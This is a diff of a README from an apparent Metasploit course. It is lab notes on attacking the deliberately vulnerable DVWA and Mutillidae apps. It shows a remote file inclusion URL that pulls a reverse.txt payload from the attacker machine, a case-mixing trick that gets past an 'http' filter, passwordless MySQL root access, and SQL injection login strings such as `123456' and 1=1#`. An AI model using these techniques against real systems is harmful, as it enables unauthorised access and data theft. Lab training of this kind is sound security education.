jensendarren/metasploit-course/README.md

 Then in the browser open the vulnerable fi page and set the `page` parameter to point to the location via http of the reverse.txt exploit file, like so `http://10.0.2.4/dvwa/vulnerabilities/fi/?page=http://10.0.2.15/reverse.txt?`

+Quick note: if you set the DVWA security level to medium the above will not work (because there is code to strip out 'http' & 'https' in the page parameter).
+However, a very simple workaround is to capitalize some part (for example like 'hTTp') - and it will work again!
+This is because the filters used (in medium security setting) are not case sensitive.

+## SQL Injection

+Firstly, login as a root user to the metasplotable mysql sever.
+This is done using the following command (this is not a hack, however, the mysql root account is not password protected on the metasplotable machine!): `mysql -u root -h 10.0.2.4`

+In Kali, open the Mutillidae application.
+Register an account and then login to check it works.

+Now logout and let's check the loging for to see if it is vulnerable!
+Enter your registered username first and in the password field just put a single quote ' and see what happens!
+What we see is a very informative error including the exact SQL that is executed. `SELECT * FROM accounts WHERE username='darren' AND password='''`

+Now lets change the password to this (assume the real password is 123456): `123456' and 1=1#`

+The single quote after the password essentially closes the password quote in the servers SQL statement.
+We can then append a 1=1 statement (which is true) and followed by a comment # to basically hide the trailing single quote that will be placed there by the server side SQL statement.

+What we should see is that we are still able to login.
+This is because we are firstly passing the correct password but also passing a 'true' sql statement (`1=1`) that is also evaluated.

+Let's confirm that the SQL that we inject after the password *is* being evaluated by passing a false statement which should cause the login request to fail, like so: `123456' and 1=2#`